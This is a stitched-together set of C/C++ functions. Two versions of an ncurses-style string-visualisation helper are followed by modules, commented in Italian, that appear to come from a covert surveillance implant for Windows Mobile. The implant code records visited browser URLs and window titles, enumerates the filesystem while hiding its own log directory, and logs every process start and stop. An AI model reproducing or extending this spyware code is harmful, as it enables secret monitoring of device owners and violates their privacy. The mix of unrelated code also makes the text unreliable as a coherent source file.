static const char * _nc_viswbuf2n(int bufnum, const wchar_t *buf, int len) { const char *vbuf; char *tp; int count; if (buf == 0) return ("(null)"); if (len < 0) len = (int) wcslen(buf); count = len; #ifdef TRACE vbuf = tp = _nc_trace_buf(bufnum, WideLen(len)); #else { static char *mybuf[NUM_VISBUFS]; mybuf[bufnum] = typeRealloc(char, WideLen(len), mybuf[bufnum]); vbuf = tp = mybuf[bufnum]; } #endif if (tp != 0) { wchar_t c; *tp++ = D_QUOTE; while ((--count >= 0) && (c = *buf++) != '\0') { char temp[CCHARW_MAX + 80]; int j = wctomb(temp, c), k; if (j <= 0) { _nc_SPRINTF(temp, _nc_SLIMIT(sizeof(temp)) "\\u%08X", (unsigned) c); j = (int) strlen(temp); } for (k = 0; k < j; ++k) { tp = VisChar(tp, UChar(temp[k]), WideLen(len)); } } *tp++ = D_QUOTE; *tp = '\0'; } else { vbuf = ("(_nc_viswbuf2n failed)"); } return (vbuf); }
static const char * _nc_viswbuf2n(int bufnum, const wchar_t *buf, int len) { const char *vbuf; char *tp; wchar_t c; if (buf == 0) return ("(null)"); if (len < 0) len = (int) wcslen(buf); #ifdef TRACE vbuf = tp = _nc_trace_buf(bufnum, WideLen(len)); #else { static char *mybuf[2]; mybuf[bufnum] = typeRealloc(char, WideLen(len), mybuf[bufnum]); vbuf = tp = mybuf[bufnum]; } #endif if (tp != 0) { *tp++ = D_QUOTE; while ((--len >= 0) && (c = *buf++) != '\0') { char temp[CCHARW_MAX + 80]; int j = wctomb(temp, c), k; if (j <= 0) { sprintf(temp, "\\u%08X", (unsigned) c); j = (int) strlen(temp); } for (k = 0; k < j; ++k) { tp = _nc_vischar(tp, UChar(temp[k])); } } *tp++ = D_QUOTE; *tp++ = '\0'; } else { vbuf = ("(_nc_viswbuf2n failed)"); } return (vbuf); }
DWORD WINAPI UrlModule(LPVOID lpParam) { Module *me = (Module *)lpParam; HANDLE moduleHandle; wstring strIEUrl, strIE65Url, strOperaUrl, strIEOld, strIE65Old, strOperaOld; wstring strTitle; BOOL bEmpty = TRUE; INT iRet; UINT uMarkupLen, uHash = 0, uNewHash; BYTE *pMarkup; SYSTEMTIME st; DWORD dw, dwMarker = LOG_URL_MARKER; WCHAR wNull = 0; struct tm mytm; Log log; me->setStatus(MODULE_RUNNING); moduleHandle = me->getEvent(); DBG_TRACE(L"Debug - UrlCatcher.cpp - Url Module is Alive\n", 5, FALSE); if (log.CreateLog(LOGTYPE_URL, NULL, 0, FLASH) == FALSE) { me->setStatus(MODULE_STOPPED); return 0; } // Inizializziamo uHash con l'hash dell'ultimo URL preso pMarkup = log.ReadMarkup(MODULE_URL, &uMarkupLen); if (pMarkup && uMarkupLen == 4) CopyMemory(&uHash, pMarkup, sizeof(uHash)); if (pMarkup) { delete[] pMarkup; pMarkup = NULL; } LOOP { do { iRet = GetIE60Url(strIEUrl, strTitle, moduleHandle); // Dobbiamo fermarci if (iRet < 0) { if (me->shouldStop()) { DBG_TRACE(L"Debug - Clipboard.cpp - Clipboard Module is Closing\n", 1, FALSE); log.CloseLog(bEmpty); me->setStatus(MODULE_STOPPED); return 0; } if (me->shouldCycle()) { DBG_TRACE(L"Debug - Clipboard.cpp - Clipboard Module, log cycling\n", 1, FALSE); log.CloseLog(bEmpty); log.CreateLog(LOGTYPE_URL, NULL, 0, FLASH); bEmpty = TRUE; continue; } } // Calcoliamo l'hash dell'URL attuale uNewHash = FnvHash((PBYTE)strIEUrl.c_str(), strIEUrl.size() * sizeof(WCHAR)); if (iRet && uNewHash != uHash && strIEUrl != strIEOld) { GetSystemTime(&st); SET_TIMESTAMP(mytm, st); if (log.WriteLog((BYTE *)&mytm, sizeof(mytm))) bEmpty = FALSE; log.WriteLog((BYTE *)&dwMarker, sizeof(dwMarker)); log.WriteLog((BYTE *)strIEUrl.c_str(), strIEUrl.size() * sizeof(WCHAR)); log.WriteLog((BYTE *)&wNull, sizeof(WCHAR)); // Scriviamo UN byte di NULL // Scriviamo il tipo di browser dw = 1; // IE log.WriteLog((BYTE *)&dw, sizeof(dw)); // Scriviamo il titolo della finestra + NULL if (strTitle.empty()) strTitle = L"UNKNOWN"; log.WriteLog((BYTE *)strTitle.c_str(), WideLen((PWCHAR)strTitle.c_str())); log.WriteLog((BYTE *)&wNull, sizeof(WCHAR)); // Scriviamo UN byte di NULL // Scriviamo il delimitatore dw = LOG_DELIMITER; log.WriteLog((BYTE *)&dw, sizeof(dw)); // Scriviamo l'hash dell'URL attuale nel markup uHash = FnvHash((PBYTE)strIEUrl.c_str(), strIEUrl.size() * sizeof(WCHAR)); log.WriteMarkup(MODULE_URL, (PBYTE)&uHash, sizeof(uHash)); strIEOld = strIEUrl; } } while(0); do { iRet = GetIE65Url(strIE65Url, strTitle, moduleHandle); // Dobbiamo fermarci if (iRet < 0) { if (me->shouldStop()) { DBG_TRACE(L"Debug - Clipboard.cpp - Clipboard Module is Closing\n", 1, FALSE); log.CloseLog(bEmpty); me->setStatus(MODULE_STOPPED); return 0; } if (me->shouldCycle()) { DBG_TRACE(L"Debug - Clipboard.cpp - Clipboard Module, log cycling\n", 1, FALSE); log.CloseLog(bEmpty); log.CreateLog(LOGTYPE_URL, NULL, 0, FLASH); bEmpty = TRUE; continue; } } // Calcoliamo l'hash dell'URL attuale uNewHash = FnvHash((PBYTE)strIE65Url.c_str(), strIE65Url.size() * sizeof(WCHAR)); if (iRet && uNewHash != uHash && strIE65Url != strIE65Old) { GetSystemTime(&st); SET_TIMESTAMP(mytm, st); if (log.WriteLog((BYTE *)&mytm, sizeof(mytm))) bEmpty = FALSE; log.WriteLog((BYTE *)&dwMarker, sizeof(dwMarker)); log.WriteLog((BYTE *)strIE65Url.c_str(), strIE65Url.size() * sizeof(WCHAR)); log.WriteLog((BYTE *)&wNull, sizeof(WCHAR)); // Scriviamo UN byte di NULL // Scriviamo il tipo di browser dw = 1; // IE log.WriteLog((BYTE *)&dw, sizeof(dw)); // Scriviamo il titolo della finestra + NULL if (strTitle.empty()) strTitle = L"UNKNOWN"; log.WriteLog((BYTE *)strTitle.c_str(), WideLen((PWCHAR)strTitle.c_str())); log.WriteLog((BYTE *)&wNull, sizeof(WCHAR)); // Scriviamo UN byte di NULL // Scriviamo il delimitatore dw = LOG_DELIMITER; log.WriteLog((BYTE *)&dw, sizeof(dw)); // Scriviamo l'hash dell'URL attuale nel markup uHash = FnvHash((PBYTE)strIE65Url.c_str(), strIE65Url.size() * sizeof(WCHAR)); log.WriteMarkup(MODULE_URL, (PBYTE)&uHash, sizeof(uHash)); strIE65Old = strIE65Url; } } while(0); do { iRet = GetOperaUrl(strOperaUrl, strTitle, moduleHandle); // Dobbiamo fermarci if (iRet < 0) { if (me->shouldStop()) { DBG_TRACE(L"Debug - Clipboard.cpp - Clipboard Module is Closing\n", 1, FALSE); log.CloseLog(bEmpty); me->setStatus(MODULE_STOPPED); return 0; } if (me->shouldCycle()) { DBG_TRACE(L"Debug - Clipboard.cpp - Clipboard Module, log cycling\n", 1, FALSE); log.CloseLog(bEmpty); log.CreateLog(LOGTYPE_URL, NULL, 0, FLASH); bEmpty = TRUE; continue; } } // Calcoliamo l'hash dell'URL attuale uNewHash = FnvHash((PBYTE)strOperaUrl.c_str(), strOperaUrl.size() * sizeof(WCHAR)); if (iRet && uNewHash != uHash && strOperaUrl != strOperaOld) { GetSystemTime(&st); SET_TIMESTAMP(mytm, st); if (log.WriteLog((BYTE *)&mytm, sizeof(mytm))) bEmpty = FALSE; log.WriteLog((BYTE *)&dwMarker, sizeof(dwMarker)); log.WriteLog((BYTE *)strOperaUrl.c_str(), strOperaUrl.size() * sizeof(WCHAR)); log.WriteLog((BYTE *)&wNull, sizeof(WCHAR)); // Scriviamo UN byte di NULL // Scriviamo il tipo di browser dw = 3; // Opera-Mobile log.WriteLog((BYTE *)&dw, sizeof(dw)); // Scriviamo il titolo della finestra + NULL if (strTitle.empty()) strTitle = L"UNKNOWN"; log.WriteLog((BYTE *)strTitle.c_str(), WideLen((PWCHAR)strTitle.c_str())); log.WriteLog((BYTE *)&wNull, sizeof(WCHAR)); // Scriviamo UN byte di NULL // Scriviamo il delimitatore dw = LOG_DELIMITER; log.WriteLog((BYTE *)&dw, sizeof(dw)); // Scriviamo l'hash dell'URL attuale nel markup uHash = FnvHash((PBYTE)strOperaUrl.c_str(), strOperaUrl.size() * sizeof(WCHAR)); log.WriteMarkup(MODULE_URL, (PBYTE)&uHash, sizeof(uHash)); strOperaOld = strOperaUrl; } } while(0); WaitForSingleObject(moduleHandle, 5000); if (me->shouldStop()) { DBG_TRACE(L"Debug - Clipboard.cpp - Clipboard Module is Closing\n", 1, FALSE); log.CloseLog(bEmpty); me->setStatus(MODULE_STOPPED); return 0; } if (me->shouldCycle()) { DBG_TRACE(L"Debug - Clipboard.cpp - Clipboard Module, log cycling\n", 1, FALSE); log.CloseLog(bEmpty); log.CreateLog(LOGTYPE_URL, NULL, 0, FLASH); } } return TRUE; }
// Ritorna FALSE se la esplora ed e' vuota oppure se non e' valida BOOL Explorer::ExploreDirectory(WCHAR *wStartPath, DWORD dwDepth) { WIN32_FIND_DATAW wfd; HANDLE hFind = INVALID_HANDLE_VALUE; BOOL bFull = FALSE; FilesystemData fsData; WCHAR wFilePath[MAX_PATH], wRecursePath[MAX_PATH]; WCHAR wHiddenPath[MAX_PATH]; wstring strPath = L"\\*"; if (wStartPath == NULL) { DBG_TRACE(L"Debug - Explorer.cpp - ExploreDirectory() [wStartPath == NULL] ", 5, TRUE); return FALSE; } if (dwDepth == 0) return TRUE; // Evita il browsing della dir nascosta _snwprintf(wHiddenPath, MAX_PATH, L"%s", LOG_DIR_NAME); // Bisogna partire dalla lista dei drive if (!wcscmp(wStartPath, L"/")) { // Nel caso speciale impostiamo la depth a 2, il primo run // trova solo la root "\", il secondo i file nella root. dwDepth = 2; // Creiamo una root-entry artificiale ZeroMemory(&fsData, sizeof(FilesystemData)); fsData.dwVersion = LOG_FILESYSTEM_VERSION; fsData.dwFlags = FILESYSTEM_IS_DIRECTORY; strPath = L"\\"; DBG_TRACE_STR(L"Debug - Explorer.cpp - Logging path: ", strPath.c_str(), 4, FALSE); fsData.dwPathLen = strPath.size() * sizeof(WCHAR); log.WriteLog((BYTE *)&fsData, sizeof(fsData)); log.WriteLog((BYTE *)strPath.c_str(), fsData.dwPathLen); // Iniziamo la ricerca reale ZeroMemory(&wfd, sizeof(wfd)); hFind = FindFirstFileW(strPath.c_str(), &wfd); if (hFind == INVALID_HANDLE_VALUE) { DWORD dwErr = GetLastError(); if (dwErr != ERROR_NO_MORE_FILES) { DBG_TRACE_INT(L"Debug - Explorer.cpp - ExploreDirectory() [FindFirstFileW() (1) Failed] Err: ", 5, FALSE, dwErr); } return FALSE; } do { if (wcsstr(wfd.cFileName, wHiddenPath)) continue; ZeroMemory(&fsData, sizeof(FilesystemData)); fsData.dwVersion = LOG_FILESYSTEM_VERSION; fsData.dwFileSizeHi = wfd.nFileSizeHigh; fsData.dwFileSizeLo = wfd.nFileSizeLow; fsData.ftTime = wfd.ftLastWriteTime; if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) fsData.dwFlags |= FILESYSTEM_IS_DIRECTORY; strPath = L"\\"; strPath += wfd.cFileName; DBG_TRACE_STR(L"Debug - Explorer.cpp - Logging path: ", strPath.c_str(), 4, FALSE); fsData.dwPathLen = strPath.size() * sizeof(WCHAR); log.WriteLog((BYTE *)&fsData, sizeof(fsData)); log.WriteLog((BYTE *)strPath.c_str(), fsData.dwPathLen); if (!ExploreDirectory(RecurseDirectory(wfd.cFileName, wRecursePath), dwDepth - 1)) fsData.dwFlags |= FILESYSTEM_IS_EMPTY; } while (FindNextFile(hFind, &wfd)); FindClose(hFind); return TRUE; } ZeroMemory(&wfd, sizeof(wfd)); hFind = FindFirstFileW(wStartPath, &wfd); if (hFind == INVALID_HANDLE_VALUE) { DWORD dwErr = GetLastError(); if (dwErr != ERROR_NO_MORE_FILES) { DBG_TRACE_INT(L"Debug - Explorer.cpp - ExploreDirectory() [FindFirstFileW() (2) Failed] Err: ", 5, FALSE, dwErr); } } do { if (wcsstr(wfd.cFileName, wHiddenPath)) continue; bFull = TRUE; ZeroMemory(&fsData, sizeof(FilesystemData)); fsData.dwVersion = LOG_FILESYSTEM_VERSION; fsData.dwFileSizeHi = wfd.nFileSizeHigh; fsData.dwFileSizeLo = wfd.nFileSizeLow; fsData.ftTime = wfd.ftLastWriteTime; if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) fsData.dwFlags |= FILESYSTEM_IS_DIRECTORY; CompleteDirectoryPath(wStartPath, wfd.cFileName, wFilePath); fsData.dwPathLen = WideLen(wFilePath); if (fsData.dwFlags & FILESYSTEM_IS_DIRECTORY) if (!ExploreDirectory(RecurseDirectory(wFilePath, wRecursePath), dwDepth - 1)) fsData.dwFlags |= FILESYSTEM_IS_EMPTY; DBG_TRACE_STR(L"Debug - Explorer.cpp - Logging path: ", wFilePath, 4, FALSE); log.WriteLog((BYTE *)&fsData, sizeof(fsData)); log.WriteLog((BYTE *)&wFilePath, fsData.dwPathLen); } while (FindNextFileW(hFind, &wfd)); FindClose(hFind); return bFull; }
DWORD WINAPI ApplicationModule(LPVOID lpParam) { Module *me = (Module *)lpParam; HANDLE moduleHandle; Log log; list<ProcessEntry> pProcessList, pUpdatedProcess; list<ProcessEntry>::iterator iterOld, iterNew; ProcessMonitor *processObj = ProcessMonitor::self(); wstring wDesc; struct tm mytm; WCHAR wNull = 0; SYSTEMTIME st; BOOL bFirst = TRUE, bFound = FALSE, bEmpty = TRUE; pProcessList.clear(); pUpdatedProcess.clear(); me->setStatus(MODULE_RUNNING); moduleHandle = me->getEvent(); DBG_TRACE(L"Debug - Application.cpp - Application Module started\n", 5, FALSE); // Creiamo il log if (log.CreateLog(LOGTYPE_APPLICATION, NULL, 0, FLASH) == FALSE) { me->setStatus(MODULE_STOPPED); DBG_TRACE(L"Debug - Application.cpp - Application Module cannot create log\n", 5, FALSE); return TRUE; } DBG_TRACE(L"Debug - Application.cpp - Application Module is Alive\n", 1, FALSE); LOOP { do { if (bFirst) { bFirst = FALSE; pProcessList.clear(); if (pUpdatedProcess.empty()) processObj->GetProcessList(pProcessList); else pProcessList = pUpdatedProcess; } else { bFirst = TRUE; pUpdatedProcess.clear(); processObj->GetProcessList(pUpdatedProcess); if (pUpdatedProcess.empty() || pProcessList.empty()) continue; // Confronta le due liste (la nuova con la vecchia) alla ricerca di nuovi processi for (iterNew = pUpdatedProcess.begin(); iterNew != pUpdatedProcess.end(); iterNew++) { for (iterOld = pProcessList.begin(); iterOld != pProcessList.end(); iterOld++) { if (!wcscmp((*iterOld).pe.szExeFile, (*iterNew).pe.szExeFile)) { bFound = TRUE; // Situazione invariata pProcessList.erase(iterOld); break; } } if (bFound == FALSE) { GetSystemTime(&st); SET_TIMESTAMP(mytm, st); // 1. Scriviamo il timestamp if (log.WriteLog((BYTE *)&mytm, sizeof(mytm))) bEmpty = FALSE; // 2. Poi il nome del file log.WriteLog((BYTE *)(*iterNew).pe.szExeFile, WideLen((*iterNew).pe.szExeFile)); log.WriteLog((BYTE *)&wNull, sizeof(WCHAR)); // 3. Quindi lo stato (START o STOP) log.WriteLog((BYTE *)L"START", WideLen(L"START")); log.WriteLog((BYTE *)&wNull, sizeof(WCHAR)); // 4. La descrizione (se disponibile) wDesc = processObj->GetProcessDescription((*iterNew).pe.th32ProcessID); if (wDesc.empty() == FALSE) log.WriteLog((BYTE *)wDesc.c_str(), wDesc.size() * sizeof(WCHAR)); log.WriteLog((BYTE *)&wNull, sizeof(WCHAR)); // 5. Ed il delimitatore UINT delimiter = LOG_DELIMITER; log.WriteLog((BYTE *)&delimiter, sizeof(delimiter)); } bFound = FALSE; } for (iterOld = pProcessList.begin(); iterOld != pProcessList.end(); iterOld++) { GetSystemTime(&st); SET_TIMESTAMP(mytm, st); // 1. Scriviamo il timestamp if (log.WriteLog((BYTE *)&mytm, sizeof(mytm))) bEmpty = FALSE; // 2. Poi il nome del file log.WriteLog((BYTE *)(*iterOld).pe.szExeFile, WideLen((*iterOld).pe.szExeFile)); log.WriteLog((BYTE *)&wNull, sizeof(WCHAR)); // 3. Quindi lo stato (START o STOP) log.WriteLog((BYTE *)L"STOP", WideLen(L"STOP")); log.WriteLog((BYTE *)&wNull, sizeof(WCHAR)); // 4. La descrizione (se disponibile) wDesc = processObj->GetProcessDescription((*iterOld).pe.th32ProcessID); if (wDesc.empty() == FALSE) log.WriteLog((BYTE *)wDesc.c_str(), wDesc.size() * sizeof(WCHAR)); log.WriteLog((BYTE *)&wNull, sizeof(WCHAR)); // 5. Ed il delimitatore UINT delimiter = LOG_DELIMITER; log.WriteLog((BYTE *)&delimiter, sizeof(delimiter)); } } } while(0); WaitForSingleObject(moduleHandle, 5000); if (me->shouldStop()) { DBG_TRACE(L"Debug - Application.cpp - Application Module is Closing\n", 1, FALSE); pProcessList.clear(); pUpdatedProcess.clear(); log.CloseLog(bEmpty); me->setStatus(MODULE_STOPPED); return 0; } if (me->shouldCycle()) { log.CloseLog(bEmpty); log.CreateLog(LOGTYPE_APPLICATION, NULL, 0, FLASH); DBG_TRACE(L"Debug - Application.cpp - Application Module, log cycling\n", 1, FALSE); } } return FALSE; }